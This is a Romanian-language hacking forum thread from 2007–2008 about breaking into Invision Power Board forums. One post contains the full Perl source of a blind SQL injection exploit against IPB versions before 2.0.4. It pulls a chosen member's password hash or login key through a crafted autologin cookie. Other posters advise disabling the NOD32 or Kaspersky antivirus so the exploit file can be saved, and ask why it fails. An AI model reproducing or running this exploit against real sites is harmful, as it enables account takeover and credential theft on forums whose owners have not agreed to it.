c0der Posted July 28, 2007 Report Posted July 28, 2007 http://rapidshare.com/files/45595861/forums_hacking.rar.htmlnu contine fisierele de baza dar scrie codul sursa in videoclipuri Quote
Kre@toR Posted September 6, 2007 Report Posted September 6, 2007 Pff...stii cumva ce exploit a folosit ? Quote
c0der Posted September 8, 2007 Author Report Posted September 8, 2007 @ kre@tor - nu am studiat odata dar am lasat balta din cauza neodihnei acute . mai imi trebuiesc cateva ore sa recuperez, ca sa fiu fresh.nush cauta si u, in clip arata cat de cat clar.@ ice t - cheers :wink: Quote
Renegade Posted September 9, 2007 Report Posted September 9, 2007 Eu am gasit exploitul,dar cand am dat sa salveze in .pl a sarit nod32.In acest caz am abandonat lucrul cu el.Uite exploitul:#!/usr/bin/perl## Invision Power Board SQL injection exploit by RST/GHC## vulnerable forum versions : 1.* , 2.* (<2.0.4)## tested on version 1.3 Final and version 2.0.2 ## * work on all mysql versions## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)## (c)oded by 1dt.w0lf## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~## screen:## ~~~~~~~## r57ipb2.pl blah.com /ipb13/ 1 0## [~] SERVER : blah.com ## [~] PATH : /ipb13/## [~] MEMBER ID : 1## [~] TARGET : 0 - IPB 1.*## [~] SEARCHING PASSWORD ... [ DONE ]#### MEMBER ID : 1## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99#### r57ipb2.pl blah.com /ipb202/ 1 1## [~] SERVER : blah.com ## [~] PATH : /ipb202/## [~] MEMBER ID : 1## [~] TARGET : 1 - IPB 2.*## [~] SEARCHING PASSWORD ... [ DONE ]#### MEMBER ID : 1## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~## Greets: James Bercegay of the GulfTech Security Research Team ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~## Credits: RST/GHC , [url]http://rst.void.ru[/url] , [url]http://ghc.ru[/url] ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~use IO::Socket;if (@ARGV < 4) { &usage; }$server = $ARGV[0];$path = $ARGV[1];$member_id = $ARGV[2];$target = $ARGV[3];$pass = ($target)?('member_login_key')'password');$server =~ s!(http:\/\/)!!;$request = 'http://';$request .= $server;$request .= $path;$s_num = 1;$|++;$n = 0;print "[~] SERVER : $server\r\n";print "[~] PATH : $path\r\n";print "[~] MEMBER ID : $member_id\r\n";print "[~] TARGET : $target";print (($target)?(' - IPB 2.*')' - IPB 1.*'));print "\r\n";print "[~] SEARCHING PASSWORD ... [|]";($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;while(1){if(&found(47,58)==0) { &found(96,122); } $char = $i;if ($char=="0") { if(length($allchar) > 0){ print qq{\b\b DONE ] MEMBER ID : $member_id }; print (($target)?('MEMBER_LOGIN_KEY : ')'PASSWORD : ')); print $allchar."\r\n"; } else { print "\b\b FAILED ]"; } exit(); }else { $allchar .= chr(42); }$s_num++;}sub found($$) { my $fmin = $_[0]; my $fmax = $_[1]; if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; } $r = int($fmax - ($fmax-$fmin)/2); $check = " BETWEEN $r AND $fmax"; if ( &check($check) ) { &found($r,$fmax); } else { &found($fmin,$r); } }sub crack($$) { my $cmin = $_[0]; my $cmax = $_[1]; $i = $cmin; while ($i<$cmax) { $crcheck = "=$i"; if ( &check($crcheck) ) { return $i; } $i++; } $i = 0; return $i; }sub check($) { $n++; status(); $ccheck = $_[0]; $pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D"; $pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28"; $pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*"; $pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg; $nmalykh = "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0%E0%F1%21%20"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80"); printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n", $path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3,$nmalykh); while(<$socket>) { if (/Set-Cookie: session_id=0;/) { return 1; } } return 0; }sub status(){ $status = $n % 5; if($status==0){ print "\b\b/]"; } if($status==1){ print "\b\b-]"; } if($status==2){ print "\b\b\\]"; } if($status==3){ print "\b\b|]"; }}sub usage() { print q( Invision Power Board v < 2.0.4 SQL injection exploit ---------------------------------------------------- USAGE: ~~~~~~ r57ipb2.pl [server] [/folder/] [member_id] [target] [server] - host where IPB installed [/folder/] - folder where IPB installed [member_id] - user id for brute targets: 0 - IPB 1.* 1 - IPB 2.* (Prior To 2.0.4) e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1 ---------------------------------------------------- (c)oded by 1dt.w0lf RST/GHC , [url]http://rst.void.ru[/url] , [url]http://ghc.ru[/url] ); exit(); } Quote
Black Pitbull- Posted September 9, 2007 Report Posted September 9, 2007 Dezactiveaza nod-ul salveaza si apoi dai drumu din nou la nod ... yo asa am facut la kaspersky Marfa melodiile dupa fundal Quote
Black Pitbull- Posted September 9, 2007 Report Posted September 9, 2007 Dar mie nu imi ruleaza cmd ul exploitul :cry: :cry: :cry: Quote
c0ld Posted June 4, 2008 Report Posted June 4, 2008 Mie de fiecare data imi da FAILED la searching for password Sursa pe care am incercat era 1.3.1. Stie cineva de ce nu merge ? Quote
neox Posted June 4, 2008 Report Posted June 4, 2008 uitate la tutorialul asa ii facut de mine si de mult ii pe forum si ii pe rotutorial cu diverse exploituri--IPB 1.3.1 Final--expl.pllinkulhttp://rstcenter.com/forum/viewtopic.php?t=10517&highlight= Quote